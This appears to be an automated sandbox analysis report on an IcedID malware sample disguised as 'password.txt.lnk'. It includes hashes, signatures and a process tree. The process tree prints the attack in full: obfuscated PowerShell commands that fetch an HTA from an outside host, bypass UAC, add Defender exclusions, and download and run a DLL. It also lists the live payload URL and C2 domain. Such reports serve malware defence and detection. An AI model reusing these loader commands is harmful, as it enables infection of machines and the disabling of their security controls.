Analysis
max time kernel: 67s
max time network: 130s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 23-06-2022 16:06
Static task: static1
Behavioral task: behavioral1
Sample: password.txt.lnk
Resource: win7-20220414-en
General
Target: password.txt.lnk
Size: 1KB
MD5: ee5dc8a66298685a6f6790e32e1a006b
SHA1: 8bd4a8e15b8c097283b67dd8201ed41e01cbe794
SHA256: 65e7327a6f3efb230a4d61966182f1d1c592aa222f4f820afaca6617680d09bd
SHA512: 8c0164d4576959d7d474cd39545db1564e459f0ab55e51df601d132d6667b41e8751d236a3850934b0575ae9c1e09e230019609669276d36849da40400f0613c
Malware Config
Extracted (URL): https://wang-data-science.com/wp-content/themes/scapeshot/etest.hta
Extracted (icedid): 3289900935, ilzenhwery.com
Signatures

UAC bypass
  Processes:
    description | ioc | process
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | powershell.exe

  suricata: ET MALWARE Win32/IcedID Request Cookie
  suricata: ET MALWARE Win32/IcedID Request Cookie

Blocklisted process makes network request 5 IoCs
  Processes:
    flow | pid | process
    6 | 3192 | mshta.exe
    8 | 3192 | mshta.exe
    10 | 3192 | mshta.exe
    16 | 4176 | powershell.exe
    23 | 3656 | rundll32.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs
  Looks up country code configured in the registry, likely geofence.
  Processes:
    description | ioc | process
    Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | cmd.exe
    Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | mshta.exe

Loads dropped DLL 1 IoCs
  Processes:
    pid | process
    3656 | rundll32.exe

Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses 6 IoCs
  Processes:
    pid | process
    3076 | powershell.exe
    3076 | powershell.exe
    4176 | powershell.exe
    4176 | powershell.exe
    3656 | rundll32.exe
    3656 | rundll32.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 3076 | powershell.exe
    Token: SeDebugPrivilege | 4176 | powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs
  Processes:
    description | pid | process | target process
    PID 5076 wrote to memory of 3076 | 5076 | cmd.exe | powershell.exe
    PID 5076 wrote to memory of 3076 | 5076 | cmd.exe | powershell.exe
    PID 3076 wrote to memory of 3192 | 3076 | powershell.exe | mshta.exe
    PID 3076 wrote to memory of 3192 | 3076 | powershell.exe | mshta.exe
    PID 3192 wrote to memory of 4176 | 3192 | mshta.exe | powershell.exe
    PID 3192 wrote to memory of 4176 | 3192 | mshta.exe | powershell.exe
    PID 4176 wrote to memory of 3656 | 4176 | powershell.exe | rundll32.exe
    PID 4176 wrote to memory of 3656 | 4176 | powershell.exe | rundll32.exe
Processes

1. C:\Windows\system32\cmd.exe
   Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\password.txt.lnk
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory

  2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
     Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $xrrCQEUf = [convert]::FromBase64String('PjIv');$rvIxkgme = [convert]::FromBase64String('GgQfAxZXHwMDBwRNWFgAFhkQWhMWAxZaBBQeEhkUElkUGBpYAAdaFBgZAxIZA1gDHxIaEgRYBBQWBxIEHxgDWBIDEgQDWR8DFg==');$BJtiaLic = -join($xrrCQEUf | % {[char] ($_ -bxor 0x77)});$uVgPreUS = -join ($rvIxkgme | % { [char] ($_ -bxor 0x77)});sal ABJmyxbD $BJtiaLic;ABJmyxbD $uVgPreUS
     - Suspicious behavior: EnumeratesProcesses
     - Suspicious use of AdjustPrivilegeToken
     - Suspicious use of WriteProcessMemory

    3. C:\Windows\system32\mshta.exe
       Command line: "C:\Windows\system32\mshta.exe" https://wang-data-science.com/wp-content/themes/scapeshot/etest.hta
       - Blocklisted process makes network request
       - Checks computer location settings
       - Suspicious use of WriteProcessMemory

      4. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function BpCExIjDrdGi($nnVDyzh, $cfMRXTCG){[IO.File]::WriteAllBytes($nnVDyzh, $cfMRXTCG)};function BgqJOAPBzie($nnVDyzh){if($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66896,66904,66904))) -eq $True){rundll32.exe $nnVDyzh ,RunObject }elseif($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66908,66911,66845))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $nnVDyzh}else{Start-Process $nnVDyzh}};function YDwYoXfkvCiX($BUsiXmWVUTyBGlhNN){$uTDDSkKDrMcCukgsB = New-Object (fibYakKGHnxcX @(66874,66897,66912,66842,66883,66897,66894,66863,66904,66901,66897,66906,66912));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cfMRXTCG = $uTDDSkKDrMcCukgsB.DownloadData($BUsiXmWVUTyBGlhNN);return $cfMRXTCG};function fibYakKGHnxcX($ZPSYkAbHDFF){$vRDpSXA=66796;$ifTikh=$Null;foreach($efauSZiRIFLSvo in $ZPSYkAbHDFF){$ifTikh+=[char]($efauSZiRIFLSvo-$vRDpSXA)};return $ifTikh};function KTcwOeFIaImkX(){$kyNirfktEagoeXnmMr = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$nGDxbpOvNNZvVHtpfa=$env:AppData; Add-MpPreference -ExclusionPath $nGDxbpOvNNZvVHtpfa;Add-MpPreference -ExclusionExtension ?lnk?;$PkAZgfWOTxnZ = $kyNirfktEagoeXnmMr + 'test.dll'; if (Test-Path -Path $PkAZgfWOTxnZ){BgqJOAPBzie $PkAZgfWOTxnZ;}Else{ $SpgGVjW = YDwYoXfkvCiX (fibYakKGHnxcX @(66900,66912,66912,66908,66911,66854,66843,66843,66915,66893,66906,66899,66841,66896,66893,66912,66893,66841,66911,66895,66901,66897,66906,66895,66897,66842,66895,66907,66905,66843,66915,66908,66841,66895,66907,66906,66912,66897,66906,66912,66843,66912,66900,66897,66905,66897,66911,66843,66911,66895,66893,66908,66897,66911,66900,66907,66912,66843,66912,66897,66911,66912,66842,66896,66904,66904));BpCExIjDrdGi $PkAZgfWOTxnZ $SpgGVjW;BgqJOAPBzie $PkAZgfWOTxnZ;};;;;}KTcwOeFIaImkX;"
         - UAC bypass
         - Blocklisted process makes network request
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory

        5. C:\Windows\system32\rundll32.exe
           Command line: "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\test.dll RunObject
           - Blocklisted process makes network request
           - Loads dropped DLL
           - Suspicious behavior: EnumeratesProcesses
Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
  SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
  SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
  SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 8b591dabf3d165412ca5160b0fc9f7a0
  SHA1: 7f4003f64d280a98099a799b7303ab94adfea747
  SHA256: d90968baa89063686e83e4514b0b0341f703aefec3e00f63020a344763e92f60
  SHA512: 57aaed079e38c08f0fe05aec21c02c84a7ed80780e796a5944227d5f17439a1b4378004931512965445826457f30488ec8f173b199e0e5374d4828c43a7e8af5

C:\Users\Admin\AppData\Roaming\test.dll
  Filesize: 858KB
  MD5: f0b052dad1a3605cd3e6d044cd315388
  SHA1: fe3d8f50b494f400bd47842d580343f38be6a04b
  SHA256: 4798655c9e1df924b92d224c53dce0e3e9028318a5fa6ee4e6bd9f0f32154cdd
  SHA512: c8ee79ae9739c1486f0a89039b69afa6057d34bf39d2be58187d265662066c052776627fa58aa519e98c072704437fc3eaa190923e351414ef9a149509ff716b
Memory dumps

memory/3076-131-0x00000183A5BF0000-0x00000183A5C12000-memory.dmp  Filesize: 136KB
memory/3076-132-0x00007FFE19500000-0x00007FFE19FC1000-memory.dmp  Filesize: 10.8MB
memory/3076-130-0x0000000000000000-mapping.dmp
memory/3076-134-0x00007FFE19500000-0x00007FFE19FC1000-memory.dmp  Filesize: 10.8MB
memory/3192-133-0x0000000000000000-mapping.dmp
memory/3656-140-0x0000000000000000-mapping.dmp
memory/3656-144-0x0000000180000000-0x0000000180009000-memory.dmp  Filesize: 36KB
memory/4176-139-0x00007FFE18250000-0x00007FFE18D11000-memory.dmp  Filesize: 10.8MB
memory/4176-136-0x0000000000000000-mapping.dmp
memory/4176-143-0x00007FFE18250000-0x00007FFE18D11000-memory.dmp  Filesize: 10.8MB